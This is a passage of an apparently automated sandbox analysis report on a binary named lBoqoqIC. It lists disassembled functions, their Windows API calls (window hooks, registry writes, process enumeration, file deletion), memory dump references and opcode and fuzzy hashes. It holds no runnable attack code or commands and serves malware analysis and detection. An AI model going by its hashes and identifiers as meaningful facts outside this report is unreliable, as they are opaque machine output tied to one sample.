                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$DecrementInterlocked_wctomb_s
                                                                                                                • String ID: %m/%d/%Y %H:%M:%S$[%s] %s
                                                                                                                • API String ID: 271162083-3005055929
                                                                                                                • Opcode ID: 0058504d119777c6d82f6a6ad8a58090eff4115013ba24d93062c7c2a6f6ddd4
                                                                                                                • Instruction ID: 05d0a97df2656164e21fee3161c23f9e188db0dd51695b12f9a0c552682e5f3e
                                                                                                                • Opcode Fuzzy Hash: 0058504d119777c6d82f6a6ad8a58090eff4115013ba24d93062c7c2a6f6ddd4
                                                                                                                • Instruction Fuzzy Hash: 5911E135800619EBCB14EBA5C906FEEBBB4FF10308F04842EA011A31D1DBB85B49CB55
                                                                                                                Function 0049A650 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • TlsGetValue.KERNEL32(0000001C,?,0049A7E5,00000000,00008CFC,?,?,?,?,?,0049F866,?,?,0049AF7F,00000000), ref: 0049A661
                                                                                                                • GetDriveTypeA.KERNEL32(?,?,0049A7E5,00000000,00008CFC,?,?,?,?,?,0049F866,?,?,0049AF7F,00000000), ref: 0049A6A0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DriveTypeValue
                                                                                                                • String ID: A:\
                                                                                                                • API String ID: 4123041233-3379428675
                                                                                                                • Opcode ID: 98669766a64af68c1017ad1ce35bfc56174c81fa0343478754a8b8bed0220472
                                                                                                                • Instruction ID: ff9414dc1de9fad6441958b88db420c16f59f985488556b3d634b407f040d334
                                                                                                                • Opcode Fuzzy Hash: 98669766a64af68c1017ad1ce35bfc56174c81fa0343478754a8b8bed0220472
                                                                                                                • Instruction Fuzzy Hash: FCF0903020524057DF148F29A89461B3BD4AFC1740F08882EF486C7212D738CC20979A
                                                                                                                Function 004C6E7B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004D4878: TlsGetValue.KERNEL32(005265C0,00000000,00000100,004D374A,004D317A,004C9C8D,00000100,004C9C26,?,?,00000100,00000000,?), ref: 004D48B7
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 004C6E9D
                                                                                                                • SetWindowsHookExA.USER32(00000005,004C6C85,00000000,00000000), ref: 004C6EAD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentHookThreadValueWindows
                                                                                                                • String ID: $aR
                                                                                                                • API String ID: 933525246-965106960
                                                                                                                • Opcode ID: fe7186e11f0f87be5382cb56b11441d7fc62b6727ddcd5dfb83b6edee5189097
                                                                                                                • Instruction ID: f02146103c818c358256a6f5d0c8e1fc1bace751998d24899cc4b88e4c92709b
                                                                                                                • Opcode Fuzzy Hash: fe7186e11f0f87be5382cb56b11441d7fc62b6727ddcd5dfb83b6edee5189097
                                                                                                                • Instruction Fuzzy Hash: 0CE065396007609ED2B06F22DC15F177AE4DBD4752F12852FF14585290D77898458F6D
                                                                                                                Function 0047E64A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(UxTheme.dll,?,0041630F), ref: 0047E65C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID: UxTheme.dll$iG
                                                                                                                • API String ID: 1029625771-2390437190
                                                                                                                • Opcode ID: 007ed99aa92d02597c228468bdced958fbf4f14d0bd85449b7cb75b4b2a39f76
                                                                                                                • Instruction ID: 523670dd9f28c27e7305f091f5931e780cea9bba07eaec001bacc1966420c2ae
                                                                                                                • Opcode Fuzzy Hash: 007ed99aa92d02597c228468bdced958fbf4f14d0bd85449b7cb75b4b2a39f76
                                                                                                                • Instruction Fuzzy Hash: CAC08CB1A023609FD3605F08E809793BAE0EF08B22F02846EE09AC3200E3F45C808BC0
                                                                                                                Function 004A2870 Relevance: 4.9, APIs: 3, Instructions: 381COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b146683814b5022ca1ee1c44c334bcd2b7dc6ac03c4516699e20f5aa8bc30cf5
                                                                                                                • Instruction ID: bd3724a04f3d8da8523a0b42202de604d25a6520dc3ca5e642b0630670a34213
                                                                                                                • Opcode Fuzzy Hash: b146683814b5022ca1ee1c44c334bcd2b7dc6ac03c4516699e20f5aa8bc30cf5
                                                                                                                • Instruction Fuzzy Hash: 27E157B1204B018FD724CE29C580A6BB7E5FBAA714F10482EE5CA83701D7B8F849DB59
                                                                                                                Function 004044F4 Relevance: 4.7, APIs: 3, Instructions: 160registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004044F9
                                                                                                                • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 004045B6
                                                                                                                • RegQueryValueExA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,000000FF,?,00000000), ref: 00404621
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: QueryValue$DecrementH_prologInterlocked
                                                                                                                • String ID:
                                                                                                                • API String ID: 1237612571-0
                                                                                                                • Opcode ID: 7528382f28028c899e1fe6c9f3e12a0a0b58a777ec8e5e12a6a885f49f894914
                                                                                                                • Instruction ID: fc0920980efee45fbcd1764342af2500b69d401bf853757527575196b227173a
                                                                                                                • Opcode Fuzzy Hash: 7528382f28028c899e1fe6c9f3e12a0a0b58a777ec8e5e12a6a885f49f894914
                                                                                                                • Instruction Fuzzy Hash: D35171B590020AAFCF14EF55CC819BFB7A8EB54354B10863FF916A6291DB389E44CB58
                                                                                                                Function 00403E6D Relevance: 4.6, APIs: 3, Instructions: 112registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00403E72
                                                                                                                  • Part of subcall function 0040523A: __EH_prolog.LIBCMT ref: 0040523F
                                                                                                                  • Part of subcall function 0040523A: RegConnectRegistryA.ADVAPI32(00000000,00000000,80000001), ref: 004052CD
                                                                                                                • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000,?,?,00000000,?,00000000), ref: 00403F19
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$ConnectCreateRegistry
                                                                                                                • String ID:
                                                                                                                • API String ID: 1842273942-0
                                                                                                                • Opcode ID: f1dd844671334bff9d5d15661f0fce51c85602ad5360fdb6cf0306c4d263b402
                                                                                                                • Instruction ID: 5a94a51e0e1a307b10566d9ea27da0203816566d87896286c0cb58d667725f46
                                                                                                                • Opcode Fuzzy Hash: f1dd844671334bff9d5d15661f0fce51c85602ad5360fdb6cf0306c4d263b402
                                                                                                                • Instruction Fuzzy Hash: E241927150061AEFCF14DF65C8859AEBBB9FF14318B10463EF416A32D1DB38AA44CB54
                                                                                                                Function 10002990 Relevance: 4.6, APIs: 3, Instructions: 106COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,?,00000002,00000000,00000000), ref: 100029D6
                                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 10002A98
                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,0000022C,00000000,?,00000000,?,00000002,00000000,00000000), ref: 10002AAD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3352388124.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_10001000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle$NextProcess32
                                                                                                                • String ID:
                                                                                                                • API String ID: 4178769372-0
                                                                                                                • Opcode ID: 88ed902c0ced1780573d8740a3fd659acb8d11b1e7ff5e31ae1650995ba61a10
                                                                                                                • Instruction ID: 791ee29df6420dbc1df9ebb71188e7b9149e9e5b8f5cb753478d4d4ed05f3943
                                                                                                                • Opcode Fuzzy Hash: 88ed902c0ced1780573d8740a3fd659acb8d11b1e7ff5e31ae1650995ba61a10
                                                                                                                • Instruction Fuzzy Hash: 17319231B012299BEB60DF64CCC47AAB3F5FB49390F1141AAEC49A7245DB34AF44CB95
                                                                                                                Function 004B1FCA Relevance: 4.6, APIs: 3, Instructions: 75timeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetLocalTime.KERNEL32(00000000), ref: 004B1FD7
                                                                                                                • GetSystemTime.KERNEL32(?), ref: 004B1FE1
                                                                                                                • GetTimeZoneInformation.KERNEL32(?), ref: 004B2036
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Time$InformationLocalSystemZone
                                                                                                                • String ID:
                                                                                                                • API String ID: 2475273158-0
                                                                                                                • Opcode ID: 3e2a79ae69ddfe7ada1d8b8ae77205117ab81feeb39ce546304fb2acab6e51cf
                                                                                                                • Instruction ID: 882b0712ff75beb724ccb766c74c26bc787052be0c9ffaf838913f20df494ec8
                                                                                                                • Opcode Fuzzy Hash: 3e2a79ae69ddfe7ada1d8b8ae77205117ab81feeb39ce546304fb2acab6e51cf
                                                                                                                • Instruction Fuzzy Hash: 5A217C6980011AA9CF21BB98E9485FF73B9EF16714F440542FE10A6195E3B99CCBD738
                                                                                                                Function 10001060 Relevance: 4.6, APIs: 3, Instructions: 72sleepCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetFileAttributesA.KERNEL32(00000000,00000000), ref: 100010A5
                                                                                                                • _strrchr.LIBCMT ref: 100010C7
                                                                                                                • Sleep.KERNEL32(00000BB8), ref: 10001106
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3352388124.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_10001000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AttributesFileSleep_strrchr
                                                                                                                • String ID:
                                                                                                                • API String ID: 3716549459-0
                                                                                                                • Opcode ID: 8bd50a9514e77996769756eb4c6cb63619a1aac733721de8239520105862a2d2
                                                                                                                • Instruction ID: 33fd65163d7709d09d2e28cddad96ba6c29136b2bcc8748d4c9500cb61dd6f37
                                                                                                                • Opcode Fuzzy Hash: 8bd50a9514e77996769756eb4c6cb63619a1aac733721de8239520105862a2d2
                                                                                                                • Instruction Fuzzy Hash: 0F110D76D015A457F721EA395C42AEF7598DF865E0F050235FD40E724DEF60ED8181E2
                                                                                                                Function 0049AD00 Relevance: 4.6, APIs: 3, Instructions: 53fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • TlsGetValue.KERNEL32(0000001C,755683C0,0049F725), ref: 0049AD07
                                                                                                                • CreateFileA.KERNEL32(00008CFC,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000), ref: 0049AD50
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0049AD73
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCreateFileHandleValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 4140045754-0
                                                                                                                • Opcode ID: ce5626d54503a7b3f5bf4b459af73d3458ef7a8503d937d6539d1571e353c893
                                                                                                                • Instruction ID: f6f4e112e4ce2bb73bfbcb23924a9de1f7d412b1aac662afb54e41e4c53ccf41
                                                                                                                • Opcode Fuzzy Hash: ce5626d54503a7b3f5bf4b459af73d3458ef7a8503d937d6539d1571e353c893
                                                                                                                • Instruction Fuzzy Hash: 7001C071A047105FE7709B78FC84B97B7E9EB91724F000629F6969B292EB34B8028794
                                                                                                                Function 0049ABE0 Relevance: 4.6, APIs: 3, Instructions: 51fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • TlsGetValue.KERNEL32(0000001C,00000AF6,00000000,7556E800,?,0049F2F9,?), ref: 0049ABEA
                                                                                                                • ReadFile.KERNEL32(?,00008F5C,?,?,00000000), ref: 0049AC13
                                                                                                                • OemToCharA.USER32(00008F5C,00008F5C), ref: 0049AC5F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CharFileReadValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 3634997981-0
                                                                                                                • Opcode ID: 0081f0f8bba094984e3009cd0cdc4d87ac9d6e9b8673cd58c5d94f3df262ad0b
                                                                                                                • Instruction ID: 1d5b2681e5679cb6685b946451578220220abf3c1ab67282c19e321293ac1009
                                                                                                                • Opcode Fuzzy Hash: 0081f0f8bba094984e3009cd0cdc4d87ac9d6e9b8673cd58c5d94f3df262ad0b
                                                                                                                • Instruction Fuzzy Hash: B70145212043867BDA248B25DD0CF93BF98EF56385F14413DF9489A242DB78A420C7FA
                                                                                                                Function 004746D8 Relevance: 4.5, APIs: 3, Instructions: 40windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004746DD
                                                                                                                  • Part of subcall function 0047EAA1: __EH_prolog.LIBCMT ref: 0047EAA6
                                                                                                                  • Part of subcall function 00416A2F: __EH_prolog.LIBCMT ref: 00416A34
                                                                                                                  • Part of subcall function 00416A2F: RemoveFontResourceA.GDI32(?), ref: 00416AC9
                                                                                                                  • Part of subcall function 00416A2F: DeleteFileA.KERNEL32(?), ref: 00416ADC
                                                                                                                  • Part of subcall function 00416A2F: DeleteFileA.KERNEL32(?), ref: 00416AE1
                                                                                                                  • Part of subcall function 00416A2F: RemoveDirectoryA.KERNEL32(?), ref: 00416AEF
                                                                                                                  • Part of subcall function 0046E6B9: __EH_prolog.LIBCMT ref: 0046E6BE
                                                                                                                • IsWindow.USER32(?), ref: 0047472D
                                                                                                                • SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 00474740
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$DeleteFileRemove$DirectoryFontMessageResourceSendWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3974206257-0
                                                                                                                • Opcode ID: fdb7ed0860c2d171336bd86c24b8177de62f87f0ec541bd3c50e2faff4b55d39
                                                                                                                • Instruction ID: aee8dc672e3bbfe0a931ba75feb733b7b542473cf7a10da7850593281d57dc1c
                                                                                                                • Opcode Fuzzy Hash: fdb7ed0860c2d171336bd86c24b8177de62f87f0ec541bd3c50e2faff4b55d39
                                                                                                                • Instruction Fuzzy Hash: 9401B530A002049FD724EF62ED52BED7770FF21344F00826EE002561E1DB785D09CB04
                                                                                                                Function 0047EECD Relevance: 4.5, APIs: 3, Instructions: 35windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 0047EEE6
                                                                                                                • TranslateMessage.USER32(?), ref: 0047EEF6
                                                                                                                • DispatchMessageA.USER32(?), ref: 0047EF00
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$DispatchPeekTranslate
                                                                                                                • String ID:
                                                                                                                • API String ID: 4217535847-0
                                                                                                                • Opcode ID: 9b5e90a7d5b3ca2b41053dccd8d8ce9ecb39ea6421882205f04e287ed5a0c160
                                                                                                                • Instruction ID: 0a900b5af952ede9e3c83384dfd3e407d7c315eabae43bab8278ecfab2e499bc
                                                                                                                • Opcode Fuzzy Hash: 9b5e90a7d5b3ca2b41053dccd8d8ce9ecb39ea6421882205f04e287ed5a0c160
                                                                                                                • Instruction Fuzzy Hash: 47F08272C0014EBACF209BB69C49DDF7B7CDBC9B40F00456AF601E2041D1649001C774
                                                                                                                Function 004CB05D Relevance: 4.5, APIs: 3, Instructions: 29windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004CB06A
                                                                                                                • TranslateMessage.USER32(?), ref: 004CB08A
                                                                                                                • DispatchMessageA.USER32(?), ref: 004CB091
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
